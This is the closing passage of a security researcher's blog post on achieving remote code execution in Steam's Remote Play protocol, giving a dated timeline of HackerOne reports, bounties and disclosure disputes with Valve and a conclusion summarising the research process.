2023-01-11 | I follow up again after two months without news. At this point I have also asked several times whether they are fine with me communicating on my findings once patches are live. |
2023-01-17 | Valve rewards me with an additional bonus bounty and pushes a new, working fix on the Steam Client Beta channel. However, they still pay no attention to my questions regarding disclosure, and I will never get an answer. |
2023-01-20 | I submit a 2nd report on HackerOne that gathers a few more minor vulnerabilities at once (including the heap overflows). |
2023-01-24 | H1 analyst asks for fully working PoCs for every single bug. I explain that I do not plan on providing those for several reasons (one of them being that developing standalone PoCs in these scenarios is highly time-consuming). I even let them know that I don’t mind not being awarded a bounty, as long as the bugs get through to Valve so that I can communicate on them at the SSTIC conference. |
2023-03-21 | I follow up after two months without news, and try to pressure them as the SSTIC deadline is getting near. |
2023-04-11 | H1 analyst informs me that Valve “didn’t reach a final decision regarding the report” (?) and warns me that disclosure would go against H1’s policy (actually, their guidelines do state that, for transparency reasons, finders are encouraged to disclose their reports if the team is unresponsive for around 6 months). |
2023-06-08 | I present my work at the SSTIC conference. I receive a lot of positive feedback, which motivates me to return to my work and spend a few days looking for an RCE (which I did not have yet at this point). |
2023-06-13 | Valve staff member changes the 2nd report status to Triaged and rewards me with a bounty. Maybe they heard of my talk? |
2023-06-19 | I discover the file write RCE and submit a 3rd report on HackerOne with a fully working PoC and a video. |
2023-06-20 | Valve staff member changes the 3rd report status to Triaged and pushes a fix to the Steam Client Beta channel (in one day!). However, they lower the severity from Critical to High and reward me with a smaller bounty. I try to explain to them that the vulnerability is indeed Critical, as they seem to have misunderstood a certain component of the CVSS rating system. |
2023-07-18 | I follow up after a month without news. Valve won’t reassess the severity to Critical (not sure why), but they do readjust the bounty correctly. |
2023-07-25 | Valve silently closes the 2nd report; fixes are seemingly pushed to the Steam Client Beta channel. |
Conclusion
In this blog post, we have covered several captivating aspects of vulnerability research:
- choosing a target and delimiting an attack surface;
- reverse engineering a product to bring out its software architecture;
- reverse engineering a protocol and constructing a partial specification;
- deducing a minimalist implementation to communicate with the client (or server);
- building a fuzzer upon all this work;
- analyzing crashes, exploiting bugs and assessing risk.
On a more personal note, I find it very satisfying to start analyzing such a product from scratch and to progressively disentangle so much hidden knowledge, up to the point where you become able to do all the things listed above.
Regarding Valve, I had read many complaints from other security researchers about them being awfully slow to validate reports, along with all kinds of other terrible experiences, so I didn’t get my hopes up too high when I began submitting my reports.
Although my experience with the reporting and the coordinated vulnerability disclosure was not perfect, I was still pleasantly surprised by how fast some of my reports were handled (the more critical ones) and by the bounties paid.
Originally published by THALIUM: Achieving Remote Code Execution in Steam: a journey into the Remote Play protocol